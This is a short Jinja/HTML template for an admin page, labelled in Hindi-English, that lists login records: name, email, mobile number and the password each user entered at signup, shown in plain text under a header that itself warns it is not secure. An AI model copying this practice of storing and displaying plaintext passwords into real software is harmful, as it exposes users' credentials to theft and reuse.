{% extends "layout.html" %}
{% block title %}Admin Panel{% endblock %}
{% block content %}
<div class="admin-panel-container">
    <h2>Admin Panel - Login Records</h2>
    <a href="{{ url_for('admin_logout') }}" class="btn btn-danger" style="float:right; margin-bottom:10px;">Logout</a>
    {% if login_data %}
    <table>
        <thead>
            <tr>
                <th>Timestamp</th>
                <th>Poora Naam</th>
                <th>Email</th>
                <th>Mobile Number</th>
                <th>Password (Signup Ke Waqt) <span class="warning">(SURAKSHIT NAHI!)</span></th>
            </tr>
        </thead>
        <tbody>
            {% for record in login_data %}
            <tr>
                <td>{{ record.timestamp }}</td>
                <td>{{ record.full_name }}</td>
                <td>{{ record.email }}</td>
                <td>{{ record.mobile }}</td>
                <td class="password-cell">{{ record.password_entered }}</td>
            </tr>
            {% endfor %}
        </tbody>
    </table>
    {% else %}
    <p>Koi login record nahi mila.</p>
    {% endif %}
</div>
{% endblock %}